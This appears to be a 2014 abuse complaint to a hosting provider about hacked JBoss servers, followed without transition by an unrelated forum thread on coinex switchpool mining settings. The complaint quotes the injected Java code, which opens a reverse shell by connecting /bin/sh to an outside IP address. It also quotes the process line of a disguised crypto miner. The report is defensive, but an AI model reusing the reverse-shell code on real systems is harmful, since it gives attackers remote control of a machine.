This was a complaint about your account.

To: abuse@rackspace.com, Nathan Simpson <nsimpson@whitsendsolutions.com>,
Chris Ranni <cranni@whitsendsolutions.com>

Dear Sirs,

I have to report to you that two of our JBoss servers were exploited today
using a Tomcat deployer hack. Specifically the following exploit
http://blog.rimuhosting.com/2011/03/17/jboss-exploits-running-python/

The following code was injected:
{
Socket socket = new Socket( "
50.57.145.165", 8081 );
Process process =
Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector(
process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector(
socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}

Note the IP address of the resulting deployment is a server in a network
address block delegated to Rackspace:

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=50.57.145.165?showDetails=true&showARIN=false&ext=netref2
#

Rackspace Hosting RACKS-8-NET-4 (NET-50-56-0-0-1) 50.56.0.0 - 50.57.255.255
Slicehost RSPC-654321664654 (NET-50-57-128-0-1) 50.57.128.0 - 50.57.159.255

Resulting in an unauthorized deployment as follows:
marx 3259 0.0 0.0 5164 1300 ? S Jan22 0:00 /bin/sh
/opt/marx/jboss-6.0.0.Final-marx/bin/run.sh -c default -b 0.0.0.0
marx 3309 2.3 36.6 1819604 644140 ? Sl Jan22 29:44 \_
/opt/marx/jdk1.7.0_45//bin/java -server -XX:MaxPermSize=256m -Xms256m
-Xmx1284m -Dsun.rmi.dgc.client.gcInterval=3600000
-Dsun.rmi.dgc.server.gcInterval=3600000
marx 12389 0.0 0.0 5160 1256 ? S 17:41 0:00 \_
/bin/sh
marx 12412 194 0.0 39612 1192 ? Sl 17:42 83:23
\_ ./javac -a scrypt -o stratum+tcp://stratum.coinex.pw:9933 -u nirgends2
-p 123456

This is clearly a bitcoin mining application, crudely disguised.

The relevant log record from JBoss being:

2014-01-23 17:41:11,814 INFO [org.jboss.deployment.MainDeployer]
(http-0.0.0.0-8080-6) deploy, url=http://50.57.145.165:60000/MDSerqWz.war
2014-01-23 17:41:12,030 INFO
[org.jboss.web.tomcat.service.deployers.TomcatDeployment]
(http-0.0.0.0-8080-6) deploy, ctxPath=/MDSerqWz

I'm guessing the server at 50.57.145.165 has already been compromised in
some way, but I would only be guessing. I'd appreciate it if you guys would
take a look and notify whoever is running that machine that they'll need to
clean it up! We will patch our systems as well.

Thanks

Sincerely,
Tod G. Harter

So what kind of returns are folks getting on the SHA256 switchpool? More than simply mining BTC? Or less?

Anyone having problem with switchpool SHA256?  I can't connect to it, and tries a few times at different part of the day/week.

I can connect to specific coin's pools, like OSC, but not the switchpool.

Ex, this works (OSC)
bfgminer -G -o stratum+tcp://stratum.coinex.pw:9025 -u <username.worker> -p <password>

But this doesn't (SwitchPool SHA256)
bfgminer -G -o stratum+tcp://stratum.coinex.pw:9944 -u <username.worker> -p <password>

By "doesn't work" i mean that there doesn't seem to be any connections.  I don't get work at all.

Regards,
Eric

Sorry, my bad...  Had to use for username just the worker name (and not username.workername).

Yeah I pointed that out on page 2. lol

It's completely different from every other pool I've mined in. lol

can you have the Chat box sizable? or maybe a popup window?
 It's annoying a little.

Hi,  Im on coinex mining scrypt at ~ 2Mh/s  using the switch pool at :9933

2 questions:

1) how do i enable auto sell?

2) I have 3 machines running cudaminer  and 1 machine running cgminer (with 2 GPUs),  im seeing alot of rejected shares on cgminer machine.   usually zero rejected shares on the cudaminer machines.  when i mine at other pools i get normal 0-0.5% rejected shares.

any ideas captainFuture?  the rejects are killing me on that cgminer machine at coinex bc that machine is my main, fastest rig.

thanks!

1) no autsell yet
2) not sure about that. i am mining on 9933 too and i have normal stats. when we are switching to faster coins the stales and rejects are higher but that is ok.

Currently I can see the following:

Quote
SwitchPool - SHA256    DEM    2.24 Gh/s    10.33 Th/s    568,584.34    less than a minute ago    1.00 | BTC

Why the SwitchPool is mining DEM not BTC when their profitability is equal?

Another question - is there any ETA for the auto-sell feature?
In my opinion it is not the most wanted thing regarding switchpool.

BTC is disabled from switchpool, cause we dont have the hash for the diff of this coin.
no ETA of auto-sell feature. What is in your opinion the most wanted thing regarding switchpool?

I can't connect to switchpool no matter if I try to put just worker name (and I've tried creating some unique workername name, then also tried username.workername as workername etc) or username.worker name as username. Anyone knows how to get this to work?

only use workername as username for miner.
set a failover pool and let it run. then your miner should see our pools alive after some time.

So does the site enforce uniqueness for the workername or the workername/password combination?

I'm mining on it just fine after I found the FAQ and got that info about using workername only, just wondered.
